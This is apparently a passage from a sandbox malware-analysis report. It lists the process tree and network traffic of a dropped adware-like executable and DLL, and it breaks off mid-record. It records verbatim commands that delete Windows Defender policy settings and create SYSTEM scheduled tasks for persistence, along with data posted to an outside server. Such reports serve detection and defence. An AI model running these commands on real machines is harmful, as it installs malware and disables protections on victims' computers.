                                                                                                        • C:\Windows\Temp\MYjwJFnMfsmfKHMw\EsLoLFOmOLSjFdG\VayHmEV.exe
                                                                                                          C:\Windows\Temp\MYjwJFnMfsmfKHMw\EsLoLFOmOLSjFdG\VayHmEV.exe aF /site_id 525403 /S
                                                                                                          2⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Checks computer location settings
                                                                                                          • Drops Chrome extension
                                                                                                          • Drops file in System32 directory
                                                                                                          • Drops file in Program Files directory
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          • Modifies system certificate store
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          PID:1436
                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                            schtasks /DELETE /F /TN "bNHXguvSZYiOwSiXLC"
                                                                                                            3⤵
                                                                                                              PID:828
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                              3⤵
                                                                                                                PID:824
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                  4⤵
                                                                                                                    PID:1956
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                  3⤵
                                                                                                                    PID:1580
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                      4⤵
                                                                                                                        PID:1752
                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                      schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\SHsJRQZsU\xarvQm.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "DNDvMcbpefrYjKZ" /V1 /F
                                                                                                                      3⤵
                                                                                                                      • Drops file in Windows directory
                                                                                                                      • Creates scheduled task(s)
                                                                                                                      PID:988
                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                      schtasks /CREATE /TN "DNDvMcbpefrYjKZ2" /F /xml "C:\Program Files (x86)\SHsJRQZsU\kLRXjoy.xml" /RU "SYSTEM"
                                                                                                                      3⤵
                                                                                                                      • Creates scheduled task(s)
                                                                                                                      PID:1232
                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                      schtasks /END /TN "DNDvMcbpefrYjKZ"
                                                                                                                      3⤵
                                                                                                                        PID:1304
                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                        schtasks /DELETE /F /TN "DNDvMcbpefrYjKZ"
                                                                                                                        3⤵
                                                                                                                          PID:1384
                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                          schtasks /CREATE /TN "WEhIDiLYPHjasB" /F /xml "C:\Program Files (x86)\ATZmuaBwNwmU2\VJVkZur.xml" /RU "SYSTEM"
                                                                                                                          3⤵
                                                                                                                          • Creates scheduled task(s)
                                                                                                                          PID:1476
                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                          schtasks /CREATE /TN "uMLBCyigOFctO2" /F /xml "C:\ProgramData\fxkldoUMcXUSOxVB\yKkyNIi.xml" /RU "SYSTEM"
                                                                                                                          3⤵
                                                                                                                          • Creates scheduled task(s)
                                                                                                                          PID:812
                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                          schtasks /CREATE /TN "kiDkdQMpQtFhhDeJz2" /F /xml "C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR\kXsnbVe.xml" /RU "SYSTEM"
                                                                                                                          3⤵
                                                                                                                          • Creates scheduled task(s)
                                                                                                                          PID:296
                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                          schtasks /CREATE /TN "VjVOLqrPjSeucnEqiOK2" /F /xml "C:\Program Files (x86)\aJAQLsoDkiWqC\Vkxcefy.xml" /RU "SYSTEM"
                                                                                                                          3⤵
                                                                                                                          • Creates scheduled task(s)
                                                                                                                          PID:1504
                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                          schtasks /CREATE /TN "mDNVJgqIdbaAfzWWp" /SC once /ST 00:27:28 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\MYjwJFnMfsmfKHMw\fSAyOplL\IAwmGHE.dll\",#1 /site_id 525403" /V1 /F
                                                                                                                          3⤵
                                                                                                                          • Drops file in Windows directory
                                                                                                                          • Creates scheduled task(s)
                                                                                                                          PID:1316
                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                          schtasks /run /I /tn "mDNVJgqIdbaAfzWWp"
                                                                                                                          3⤵
                                                                                                                            PID:1464
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                            3⤵
                                                                                                                              PID:1924
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                4⤵
                                                                                                                                  PID:188
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                3⤵
                                                                                                                                  PID:2040
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                    4⤵
                                                                                                                                      PID:1884
                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                    schtasks /DELETE /F /TN "VgOpnHVQDAdMZqNFB"
                                                                                                                                    3⤵
                                                                                                                                      PID:852
                                                                                                                                  • C:\Windows\system32\rundll32.EXE
                                                                                                                                    C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\MYjwJFnMfsmfKHMw\fSAyOplL\IAwmGHE.dll",#1 /site_id 525403
                                                                                                                                    2⤵
                                                                                                                                      PID:268
                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                        C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\MYjwJFnMfsmfKHMw\fSAyOplL\IAwmGHE.dll",#1 /site_id 525403
                                                                                                                                        3⤵
                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        • Drops file in System32 directory
                                                                                                                                        • Enumerates system info in registry
                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                        PID:1224
                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                          schtasks /DELETE /F /TN "mDNVJgqIdbaAfzWWp"
                                                                                                                                          4⤵
                                                                                                                                            PID:812
                                                                                                                                    • C:\Windows\system32\gpscript.exe
                                                                                                                                      gpscript.exe /RefreshSystemParam
                                                                                                                                      1⤵
                                                                                                                                        PID:1224
                                                                                                                                      • C:\Windows\system32\gpscript.exe
                                                                                                                                        gpscript.exe /RefreshSystemParam
                                                                                                                                        1⤵
                                                                                                                                          PID:1636
                                                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                                                          \??\C:\Windows\system32\conhost.exe "1981821563-35458466420465691442061143711-1246194739748165634981519170927882650"
                                                                                                                                          1⤵
                                                                                                                                          • Windows security bypass
                                                                                                                                          PID:2044
                                                                                                                                        • C:\Windows\system32\gpscript.exe
                                                                                                                                          gpscript.exe /RefreshSystemParam
                                                                                                                                          1⤵
                                                                                                                                            PID:696

                                                                                                                                          Network

                                                                                                                                          • flag-us
                                                                                                                                            DNS
                                                                                                                                            service-domain.xyz
                                                                                                                                            rundll32.exe
                                                                                                                                            Remote address:
                                                                                                                                            8.8.8.8:53
                                                                                                                                            Request
                                                                                                                                            service-domain.xyz
                                                                                                                                            IN A
                                                                                                                                            Response
                                                                                                                                            service-domain.xyz
                                                                                                                                            IN A
                                                                                                                                            18.169.191.45
                                                                                                                                          • flag-us
                                                                                                                                            DNS
                                                                                                                                            addons.mozilla.org
                                                                                                                                            VayHmEV.exe
                                                                                                                                            Remote address:
                                                                                                                                            8.8.8.8:53
                                                                                                                                            Request
                                                                                                                                            addons.mozilla.org
                                                                                                                                            IN A
                                                                                                                                            Response
                                                                                                                                            addons.mozilla.org
                                                                                                                                            IN A
                                                                                                                                            13.227.219.127
                                                                                                                                            addons.mozilla.org
                                                                                                                                            IN A
                                                                                                                                            13.227.219.68
                                                                                                                                            addons.mozilla.org
                                                                                                                                            IN A
                                                                                                                                            13.227.219.86
                                                                                                                                            addons.mozilla.org
                                                                                                                                            IN A
                                                                                                                                            13.227.219.11
                                                                                                                                          • flag-nl
                                                                                                                                            GET
                                                                                                                                            http://addons.mozilla.org/firefox/downloads/latest/find-it-pro?PQIzPHOVZK
                                                                                                                                            VayHmEV.exe
                                                                                                                                            Remote address:
                                                                                                                                            13.227.219.127:80
                                                                                                                                            Request
                                                                                                                                            GET /firefox/downloads/latest/find-it-pro?PQIzPHOVZK HTTP/1.1
                                                                                                                                            Host: addons.mozilla.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Response
                                                                                                                                            HTTP/1.1 301 Moved Permanently
                                                                                                                                            Server: CloudFront
                                                                                                                                            Date: Sun, 25 Sep 2022 00:23:18 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 167
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Location: https://addons.mozilla.org/firefox/downloads/latest/find-it-pro?PQIzPHOVZK
                                                                                                                                            X-Cache: Redirect from cloudfront
                                                                                                                                            Via: 1.1 697a26790d3ab8292d8546ca9be87bbc.cloudfront.net (CloudFront)
                                                                                                                                            X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                            X-Amz-Cf-Id: AH8E6oelz7VqazzUJ2lY_WQaAvEDZrLea54KG3w-VGuWNWDbvkFvfA==
                                                                                                                                          • flag-nl
                                                                                                                                            GET
                                                                                                                                            http://addons.mozilla.org/firefox/downloads/latest/find-it-pro?rqDltwggxL
                                                                                                                                            VayHmEV.exe
                                                                                                                                            Remote address:
                                                                                                                                            13.227.219.127:80
                                                                                                                                            Request
                                                                                                                                            GET /firefox/downloads/latest/find-it-pro?rqDltwggxL HTTP/1.1
                                                                                                                                            Host: addons.mozilla.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Response
                                                                                                                                            HTTP/1.1 301 Moved Permanently
                                                                                                                                            Server: CloudFront
                                                                                                                                            Date: Sun, 25 Sep 2022 00:23:19 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 167
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Location: https://addons.mozilla.org/firefox/downloads/latest/find-it-pro?rqDltwggxL
                                                                                                                                            X-Cache: Redirect from cloudfront
                                                                                                                                            Via: 1.1 697a26790d3ab8292d8546ca9be87bbc.cloudfront.net (CloudFront)
                                                                                                                                            X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                            X-Amz-Cf-Id: fe3tlQCUs3kx3Owg9j7wg6XoDi1qykTMn7f1gglCKr0HKCZUbkmVHw==
                                                                                                                                          • flag-nl
                                                                                                                                            GET
                                                                                                                                            https://addons.mozilla.org/firefox/downloads/latest/find-it-pro?PQIzPHOVZK
                                                                                                                                            VayHmEV.exe
                                                                                                                                            Remote address:
                                                                                                                                            13.227.219.127:443
                                                                                                                                            Request
                                                                                                                                            GET /firefox/downloads/latest/find-it-pro?PQIzPHOVZK HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Host: addons.mozilla.org
                                                                                                                                            Response
                                                                                                                                            HTTP/1.1 301 Moved Permanently
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Content-Length: 0
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: s-maxage=0
                                                                                                                                            Content-Security-Policy: media-src https://videos.cdn.mozilla.net; style-src 'unsafe-inline' https://addons.mozilla.org/static-server/; connect-src 'self' https://www.google-analytics.com; script-src https://www.google-analytics.com/analytics.js https://www.recaptcha.net/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://addons.mozilla.org/static-server/; child-src https://www.recaptcha.net/recaptcha/; object-src 'none'; font-src 'self' https://addons.mozilla.org/static-server/; default-src 'none'; frame-src https://www.recaptcha.net/recaptcha/; form-action 'self'; img-src 'self' blob: data: https://addons.mozilla.org/static-server/ https://addons.mozilla.org/user-media/; report-uri /__cspreport__
                                                                                                                                            Date: Sun, 25 Sep 2022 00:23:19 GMT
                                                                                                                                            Location: /firefox/downloads/latest/find-it-pro/?PQIzPHOVZK
                                                                                                                                            Public-Key-Pins: max-age=5184000; includeSubDomains; pin-sha256="WoiWRyIOVNa9ihaBciRSC7XHjliYS9VwUGOIud4PB18="; pin-sha256="r/mIkG3eEpVdm+u/ko/cwxzOMo1bk4TyHIlByibiA5E="
                                                                                                                                            Referrer-Policy: same-origin
                                                                                                                                            Server: nginx
                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                            X-Cache: Miss from cloudfront
                                                                                                                                            Via: 1.1 d2322e4264977966de69a888b2e0eba8.cloudfront.net (CloudFront)
                                                                                                                                            X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                            X-Amz-Cf-Id: C6TlrWYlSBpI-hTr51FzpDBsBPKiRxxA0Gk9yMiljpOMs2Acsk2R4Q==
                                                                                                                                          • flag-nl
                                                                                                                                            GET
                                                                                                                                            https://addons.mozilla.org/firefox/downloads/latest/find-it-pro/?PQIzPHOVZK
                                                                                                                                            VayHmEV.exe
                                                                                                                                            Remote address:
                                                                                                                                            13.227.219.127:443
                                                                                                                                            Request
                                                                                                                                            GET /firefox/downloads/latest/find-it-pro/?PQIzPHOVZK HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Host: addons.mozilla.org
                                                                                                                                            Response
                                                                                                                                            HTTP/1.1 404 Not Found
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Content-Length: 11786
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: s-maxage=0
                                                                                                                                            Content-Security-Policy: media-src https://videos.cdn.mozilla.net; form-action 'self'; object-src 'none'; img-src 'self' blob: data: https://addons.mozilla.org/static-server/ https://addons.mozilla.org/user-media/; connect-src 'self' https://www.google-analytics.com; font-src 'self' https://addons.mozilla.org/static-server/; child-src https://www.recaptcha.net/recaptcha/; frame-src https://www.recaptcha.net/recaptcha/; style-src 'unsafe-inline' https://addons.mozilla.org/static-server/; default-src 'none'; script-src https://www.google-analytics.com/analytics.js https://www.recaptcha.net/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://addons.mozilla.org/static-server/; report-uri /__cspreport__
                                                                                                                                            Date: Sun, 25 Sep 2022 00:23:19 GMT
                                                                                                                                            ETag: "f47b2200f0faaed384698ed7fd4c52d7"
                                                                                                                                            Referrer-Policy: same-origin
                                                                                                                                            Server: nginx
                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                            X-AMO-Request-ID: 4d436b1a526a4944b8995de676f6fe60
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                            Vary: Accept-Encoding,Accept-Encoding
                                                                                                                                            X-Cache: Error from cloudfront
                                                                                                                                            Via: 1.1 d2322e4264977966de69a888b2e0eba8.cloudfront.net (CloudFront)
                                                                                                                                            X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                            X-Amz-Cf-Id: XqD8gNcONJDf6ztSp1H5fzbYqCG1xfkuqWmINE-eQSljMU1DsTqMGw==
                                                                                                                                          • flag-nl
                                                                                                                                            GET
                                                                                                                                            https://addons.mozilla.org/firefox/downloads/latest/find-it-pro?rqDltwggxL
                                                                                                                                            VayHmEV.exe
                                                                                                                                            Remote address:
                                                                                                                                            13.227.219.127:443
                                                                                                                                            Request
                                                                                                                                            GET /firefox/downloads/latest/find-it-pro?rqDltwggxL HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Host: addons.mozilla.org
                                                                                                                                            Response
                                                                                                                                            HTTP/1.1 301 Moved Permanently
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Content-Length: 0
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: s-maxage=0
                                                                                                                                            Content-Security-Policy: media-src https://videos.cdn.mozilla.net; img-src 'self' blob: data: https://addons.mozilla.org/static-server/ https://addons.mozilla.org/user-media/; connect-src 'self' https://www.google-analytics.com; form-action 'self'; font-src 'self' https://addons.mozilla.org/static-server/; default-src 'none'; style-src 'unsafe-inline' https://addons.mozilla.org/static-server/; script-src https://www.google-analytics.com/analytics.js https://www.recaptcha.net/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://addons.mozilla.org/static-server/; child-src https://www.recaptcha.net/recaptcha/; frame-src https://www.recaptcha.net/recaptcha/; object-src 'none'; report-uri /__cspreport__
                                                                                                                                            Date: Sun, 25 Sep 2022 00:23:20 GMT
                                                                                                                                            Location: /firefox/downloads/latest/find-it-pro/?rqDltwggxL
                                                                                                                                            Public-Key-Pins: max-age=5184000; includeSubDomains; pin-sha256="WoiWRyIOVNa9ihaBciRSC7XHjliYS9VwUGOIud4PB18="; pin-sha256="r/mIkG3eEpVdm+u/ko/cwxzOMo1bk4TyHIlByibiA5E="
                                                                                                                                            Referrer-Policy: same-origin
                                                                                                                                            Server: nginx
                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                            X-Cache: Miss from cloudfront
                                                                                                                                            Via: 1.1 d2322e4264977966de69a888b2e0eba8.cloudfront.net (CloudFront)
                                                                                                                                            X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                            X-Amz-Cf-Id: 4Vb4lyn6dP1t3JQD-yWaXZ_yNjAKiDFfYRH8T9AFVSW2HAxSdif3TA==
                                                                                                                                          • flag-nl
                                                                                                                                            GET
                                                                                                                                            https://addons.mozilla.org/firefox/downloads/latest/find-it-pro/?rqDltwggxL
                                                                                                                                            VayHmEV.exe
                                                                                                                                            Remote address:
                                                                                                                                            13.227.219.127:443
                                                                                                                                            Request
                                                                                                                                            GET /firefox/downloads/latest/find-it-pro/?rqDltwggxL HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Host: addons.mozilla.org
                                                                                                                                            Response
                                                                                                                                            HTTP/1.1 404 Not Found
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Content-Length: 11786
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: s-maxage=0
                                                                                                                                            Content-Security-Policy: media-src https://videos.cdn.mozilla.net; img-src 'self' blob: data: https://addons.mozilla.org/static-server/ https://addons.mozilla.org/user-media/; connect-src 'self' https://www.google-analytics.com; form-action 'self'; font-src 'self' https://addons.mozilla.org/static-server/; default-src 'none'; style-src 'unsafe-inline' https://addons.mozilla.org/static-server/; script-src https://www.google-analytics.com/analytics.js https://www.recaptcha.net/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://addons.mozilla.org/static-server/; child-src https://www.recaptcha.net/recaptcha/; frame-src https://www.recaptcha.net/recaptcha/; object-src 'none'; report-uri /__cspreport__
                                                                                                                                            Date: Sun, 25 Sep 2022 00:23:20 GMT
                                                                                                                                            ETag: "d6b61a36685f1908ae401fb5edd92af5"
                                                                                                                                            Referrer-Policy: same-origin
                                                                                                                                            Server: nginx
                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                            X-AMO-Request-ID: 73893d8539044bf997dd5f674da2784c
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                            Vary: Accept-Encoding,Accept-Encoding
                                                                                                                                            X-Cache: Error from cloudfront
                                                                                                                                            Via: 1.1 d2322e4264977966de69a888b2e0eba8.cloudfront.net (CloudFront)
                                                                                                                                            X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                            X-Amz-Cf-Id: 8O508viGUj1qXhf67WZjxwd3OTDzfR6zufiy3RmnQjVjhsQAy3w89g==
                                                                                                                                          • flag-us
                                                                                                                                            DNS
                                                                                                                                            clients2.google.com
                                                                                                                                            VayHmEV.exe
                                                                                                                                            Remote address:
                                                                                                                                            8.8.8.8:53
                                                                                                                                            Request
                                                                                                                                            clients2.google.com
                                                                                                                                            IN A
                                                                                                                                            Response
                                                                                                                                            clients2.google.com
                                                                                                                                            IN CNAME
                                                                                                                                            clients.l.google.com
                                                                                                                                            clients.l.google.com
                                                                                                                                            IN A
                                                                                                                                            172.217.168.238
                                                                                                                                          • flag-nl
                                                                                                                                            GET
                                                                                                                                            https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Dmeejmcfbiapijdfaadackoblffmidlig%26installsource%3Dondemand%26uc&PrYNnxcapY
                                                                                                                                            VayHmEV.exe
                                                                                                                                            Remote address:
                                                                                                                                            172.217.168.238:443
                                                                                                                                            Request
                                                                                                                                            GET /service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Dmeejmcfbiapijdfaadackoblffmidlig%26installsource%3Dondemand%26uc&PrYNnxcapY HTTP/1.1
                                                                                                                                            Host: clients2.google.com
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Response
                                                                                                                                            HTTP/1.1 302 Moved Temporarily
                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-RI8LY_H-bfCAYnbS9pWLyA' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                            Date: Sun, 25 Sep 2022 00:23:21 GMT
                                                                                                                                            Location: https://clients2.googleusercontent.com/crx/blobs/Acy1k0Yxs5-aqFPu2Xf-6romjZTKLARO5sPEMupnCQJRP4_boTg6TQ96YXtv2pelavlKWpeXst-2qUXhAx_Pg0_bBXlipOCEbMNbjQvKSIP3rb_Vpr4AxlKa5UBQIZTERY2UqjZtm77P_gcBTP6m/extension_1_0_0_8.crx
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                            Server: GSE
                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                            Accept-Ranges: none
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                          • flag-us
                                                                                                                                            DNS
                                                                                                                                            clients2.googleusercontent.com
                                                                                                                                            VayHmEV.exe
                                                                                                                                            Remote address:
                                                                                                                                            8.8.8.8:53
                                                                                                                                            Request
                                                                                                                                            clients2.googleusercontent.com
                                                                                                                                            IN A
                                                                                                                                            Response
                                                                                                                                            clients2.googleusercontent.com
                                                                                                                                            IN CNAME
                                                                                                                                            googlehosted.l.googleusercontent.com
                                                                                                                                            googlehosted.l.googleusercontent.com
                                                                                                                                            IN A
                                                                                                                                            142.251.39.97
                                                                                                                                          • flag-nl
                                                                                                                                            GET
                                                                                                                                            https://clients2.googleusercontent.com/crx/blobs/Acy1k0Yxs5-aqFPu2Xf-6romjZTKLARO5sPEMupnCQJRP4_boTg6TQ96YXtv2pelavlKWpeXst-2qUXhAx_Pg0_bBXlipOCEbMNbjQvKSIP3rb_Vpr4AxlKa5UBQIZTERY2UqjZtm77P_gcBTP6m/extension_1_0_0_8.crx
                                                                                                                                            VayHmEV.exe
                                                                                                                                            Remote address:
                                                                                                                                            142.251.39.97:443
                                                                                                                                            Request
                                                                                                                                            GET /crx/blobs/Acy1k0Yxs5-aqFPu2Xf-6romjZTKLARO5sPEMupnCQJRP4_boTg6TQ96YXtv2pelavlKWpeXst-2qUXhAx_Pg0_bBXlipOCEbMNbjQvKSIP3rb_Vpr4AxlKa5UBQIZTERY2UqjZtm77P_gcBTP6m/extension_1_0_0_8.crx HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Host: clients2.googleusercontent.com
                                                                                                                                            Response
                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                            X-GUploader-UploadID: ADPycds_47Oz2E4fyXRb-Dfs5DSWpwHH2HQ2X0tXCD1eUV0la5dJZ2nzd4j9coQ9hECRuBlAODHYumC9oKxNe-ZUzPyuthUqzzQd
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Content-Length: 11778
                                                                                                                                            X-Goog-Hash: crc32c=dEQkHA==
                                                                                                                                            Server: UploadServer
                                                                                                                                            Date: Sat, 24 Sep 2022 04:41:45 GMT
                                                                                                                                            Expires: Sun, 24 Sep 2023 04:41:45 GMT
                                                                                                                                            Cache-Control: public, max-age=31536000
                                                                                                                                            Age: 70896
                                                                                                                                            Last-Modified: Tue, 30 Aug 2022 12:21:37 GMT
                                                                                                                                            ETag: d929f678_c0efeeeb_a3e1f727_0dc533b3_5436efcf
                                                                                                                                            Content-Type: application/x-chrome-extension
                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                          • flag-us
                                                                                                                                            DNS
                                                                                                                                            api2.testrequest.info
                                                                                                                                            rundll32.exe
                                                                                                                                            Remote address:
                                                                                                                                            8.8.8.8:53
                                                                                                                                            Request
                                                                                                                                            api2.testrequest.info
                                                                                                                                            IN A
                                                                                                                                            Response
                                                                                                                                            api2.testrequest.info
                                                                                                                                            IN CNAME
                                                                                                                                            tracemonitor-1495159681.us-west-2.elb.amazonaws.com
                                                                                                                                            tracemonitor-1495159681.us-west-2.elb.amazonaws.com
                                                                                                                                            IN A
                                                                                                                                            54.184.215.74
                                                                                                                                            tracemonitor-1495159681.us-west-2.elb.amazonaws.com
                                                                                                                                            IN A
                                                                                                                                            54.148.130.97
                                                                                                                                          • flag-us
                                                                                                                                            POST
                                                                                                                                            http://api2.testrequest.info/api2/google_api_ifi
                                                                                                                                            rundll32.exe
                                                                                                                                            Remote address:
                                                                                                                                            54.184.215.74:80
                                                                                                                                            Request
                                                                                                                                            POST /api2/google_api_ifi HTTP/1.1
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/0 Safari/537.36
                                                                                                                                            Host: api2.testrequest.info
                                                                                                                                            Content-Length: 722
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Response
                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Cache-control: no-cache="set-cookie"
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Date: Sun, 25 Sep 2022 00:36:41 GMT
                                                                                                                                            Server: nginx
                                                                                                                                            Set-Cookie: AWSELB=93A75B7E2B3FFE007FB2AA9C86866E676C97DF5D01A0C3DF75E47261A936E85F0F94789828414D0087ED3D54B1953BEE6126D6B6D353BBF61BEDA051D1ABE982173895FC;PATH=/;MAX-AGE=43200
                                                                                                                                            Content-Length: 0
                                                                                                                                            Connection: keep-alive
                                                                                                                                          • flag-us
                                                                                                                                            DNS
                                                                                                                                            api4.testrequest.info
                                                                                                                                            rundll32.exe
                                                                                                                                            Remote address:
                                                                                                                                            8.8.8.8:53
                                                                                                                                            Request
                                                                                                                                            api4.testrequest.info
                                                                                                                                            IN A
                                                                                                                                            Response
                                                                                                                                            api4.testrequest.info
                                                                                                                                            IN CNAME
                                                                                                                                            tracemonitor-1495159681.us-west-2.elb.amazonaws.com
                                                                                                                                            tracemonitor-1495159681.us-west-2.elb.amazonaws.com
                                                                                                                                            IN A
                                                                                                                                            54.184.215.74
                                                                                                                                            tracemonitor-1495159681.us-west-2.elb.amazonaws.com
                                                                                                                                            IN A
